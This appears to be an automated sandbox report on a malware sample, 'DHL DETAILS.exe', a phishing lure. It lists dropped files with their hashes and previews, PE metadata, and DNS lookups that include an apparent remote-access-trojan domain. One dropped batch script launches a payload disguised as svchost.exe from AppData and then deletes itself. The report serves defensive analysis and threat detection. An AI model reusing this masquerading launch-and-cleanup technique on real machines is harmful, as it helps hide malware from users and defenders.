                                                                                    Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
                                                                                    Process:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):330
                                                                                    Entropy (8bit):3.122207559284839
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kK3cNXTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:P8X8kPlE99SNxAhUe1HEVo
                                                                                    MD5:39830678857B79A99DAAF06A36E3F810
                                                                                    SHA1:5A876F0DE2896DEE872F0B6EAB9B21470BA1CB3B
                                                                                    SHA-256:C46C2C78434BDA1AAD26E920594343DCA875816888C8AF1DDE9D9556A15672EE
                                                                                    SHA-512:40455737B716D5267137A435A7FB21DB9C3F068DB69E2E700E636D64BB0167827B6A1B4A32213E13D51A88F23DCADD6F2CB5CDD53993C553017D95892D9FD47D
                                                                                    Malicious:false
                                                                                    Preview:p...... ........5.`."r..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...
                                                                                    Process:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1938
                                                                                    Entropy (8bit):5.380045458118996
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkl+vxp3/elFH6HNpv:iq+wmj0qCYqGSI6oPtzHeqKksZp/elF6
                                                                                    MD5:B9C6D7FFE24CE7F55C73477F8A6155CA
                                                                                    SHA1:B3E4B555E4A4421E513FF38AF312B1F81AAB1BFF
                                                                                    SHA-256:9EDE165289DC2B176C2EB4A9A3518F24A424795F81456AD631ACA1468E2242FB
                                                                                    SHA-512:38C60EC1424F2AF775609E0E46E0CC245267BC794A7F50D78181409615222BAC4C2F5128975D3DBC06D4BE8FBD1EC6AF8B618CB489D6BEEE5A97D95CAC605915
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):841
                                                                                    Entropy (8bit):5.351831766340675
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
                                                                                    MD5:98DCC730A3C77DCDCA7CD8717EB5D42A
                                                                                    SHA1:639509210C17EB73F5DB581FA8CA46B1157D8806
                                                                                    SHA-256:E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
                                                                                    SHA-512:7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):19253
                                                                                    Entropy (8bit):5.005213177851637
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:JVib49PVoGIpN6KQkj2kkjh4iUxGhQw4h3OdB0NXp528vOjJwYo8YKib4o:JFPV3IpNBQkj2Nh4iUxGhl4h3OdB0NZf
                                                                                    MD5:83CC0A063AE0CE6A770449E01B262D4C
                                                                                    SHA1:C7CE3B64EDC6EE028A45E627CF26BF4FD53B71A1
                                                                                    SHA-256:A9AEE05DF0FDCBF68D93BCDD148D152AA05DC301F6C7DA4E450C8D38AAF195AA
                                                                                    SHA-512:BF95B77DBCDF81F4DE6D9D4CBCFDC286129CD413BE5C4196E22D9CDC8807FB9BC58C3F3F779157A85C9301EC4AC0EE12BB9E34F8B75AA6ED0C55DD80374D37A2
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):153
                                                                                    Entropy (8bit):5.028023400894919
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC5ZACSmqRDUkh4E2J5xAInTRI68VZPy:hWKqTtT69aZ5Omq1923fTb8Vk
                                                                                    MD5:7B575CF10B0C8B1360CC9855F41F4A84
                                                                                    SHA1:F293BC3A7A71C0CB6B7274C8B391811FF24805B3
                                                                                    SHA-256:4BB791EDCB90D2F8D47793F1E9F4E33BA9A132ED322970F3FEC03FE42879065A
                                                                                    SHA-512:6005CC75385BAC5DE4A7B1B97A5B78CC05B680FFF2BA9F024437065F42564FFA971E84DCBBEF429E0BDDFBD5A5645B6E0816A9DA8EEBFBF8029DBA0E833A43D2
                                                                                    Malicious:false
                                                                                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp5A0E.tmp.bat" /f /q..
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):108664
                                                                                    Entropy (8bit):5.8959760602012965
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
                                                                                    MD5:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    SHA1:8C68CA3F013C490161C0156EF359AF03594AE5E2
                                                                                    SHA-256:7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
                                                                                    SHA-512:D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: payment.exe, Detection: malicious, Browse
                                                                                    • Filename: New Order 7003153933.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe, Detection: malicious, Browse
                                                                                    • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                    • Filename: CHEMICAL SPECIFICATION.exe, Detection: malicious, Browse
                                                                                    • Filename: Quotation.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: QUOTATION#00913-1HNMR FORMONONETIN LIST.exe, Detection: malicious, Browse
                                                                                    • Filename: FAC- IST9G4VW.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                                                                                    Process:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):6.296472132107685
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ORSWgr22fLIXyiTUL7n15OaZdMUUMGq5NgvzRxoIdZH:ORD52fEXyAULxVZdMU1loLHoAF
                                                                                    MD5:0603858E620614E6BADC889156F4F868
                                                                                    SHA1:9E3A8D66B1A788B262F047FC0E13830292911D5B
                                                                                    SHA-256:922D60E40972C644FF506CE7475A18636AFA17ABDAD800CFAF9FBC413A742E76
                                                                                    SHA-512:7C8C09D43E7798B37F9A678DFC0615D2716293B4B35E3049964CED86B065A0537595A12186E2B1156D418DA6AE4407A9C88FAC1879C34BC8AA11CFE7D485506F
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                    • Antivirus: Virustotal, Detection: 35%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.................. ....@...... ....................................`............................................................................................8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........@...u......Y...................................................H......./a..I...VeM.T#B..\/E.D.aW..8+..>F~.....o....o....*F~.....o....o....*Vs$........s$........*..,...{.....`}....*..{.....f_}....*j.{....-..s'...}.....{....*..{....*..{....*:..}.....o,...*..{.....3..{....*.(.....{....o-...o....*..{....*...}.....{.....{....(3...,...{....}.......{....((...($...*..{....*...}.....{.....{....(3...,...}.......{....((...($...*..(4...*"..(5...*"..(6...*"..(7...*b.{....,..{.....j.....*
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):55
                                                                                    Entropy (8bit):4.306461250274409
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                    Malicious:false
                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                    Process:C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):298
                                                                                    Entropy (8bit):4.924206445966445
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
                                                                                    MD5:932782CF70ED00D22C0B08B5027B4E31
                                                                                    SHA1:78F460A2155D9E819B8452C281285D7E0A7AC14F
                                                                                    SHA-256:F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
                                                                                    SHA-512:C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
                                                                                    Malicious:false
                                                                                    Preview:Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                                                    Process:C:\Windows\System32\timeout.exe
                                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.41440934524794
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                    Malicious:false
                                                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):6.296472132107685
                                                                                    TrID:
                                                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                    • DOS Executable Generic (2002/1) 0.46%
                                                                                    File name:DHL DETAILS.exe
                                                                                    File size:40'960 bytes
                                                                                    MD5:0603858e620614e6badc889156f4f868
                                                                                    SHA1:9e3a8d66b1a788b262f047fc0e13830292911d5b
                                                                                    SHA256:922d60e40972c644ff506ce7475a18636afa17abdad800cfaf9fbc413a742e76
                                                                                    SHA512:7c8c09d43e7798b37f9a678dfc0615d2716293b4b35e3049964ced86b065a0537595a12186e2b1156d418da6ae4407a9c88fac1879c34bc8aa11cfe7d485506f
                                                                                    SSDEEP:768:ORSWgr22fLIXyiTUL7n15OaZdMUUMGq5NgvzRxoIdZH:ORD52fEXyAULxVZdMU1loLHoAF
                                                                                    TLSH:56036C22AA4C1237C9BF42F94C5140C03775E30377D6EBBA9CD651925A837C27AB0E9E
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.................. ....@...... ....................................`................................
                                                                                    Icon Hash:00928e8e8686b000
                                                                                    Entrypoint:0x400000
                                                                                    Entrypoint Section:
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:
                                                                                    Instruction
                                                                                    dec ebp
                                                                                    pop edx
                                                                                    nop
                                                                                    add byte ptr [ebx], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax+eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5d6.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb6c40x38.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x97840x9800096fdac7260fee49186bbcc26cff2aabFalse0.5958059210526315data6.3660577496040185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xc0000x5d60x600f1ee9f02a5cb6e37adf0d993ee3f387bFalse0.4186197916666667data4.124252649326652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0xc0a00x34cdata0.4099526066350711
                                                                                    RT_MANIFEST0xc3ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 9, 2024 13:14:09.451955080 CET192.168.2.51.1.1.10x645fStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:13.728269100 CET192.168.2.51.1.1.10x68fStandard query (0)artemis-rat.comA (IP address)IN (0x0001)false
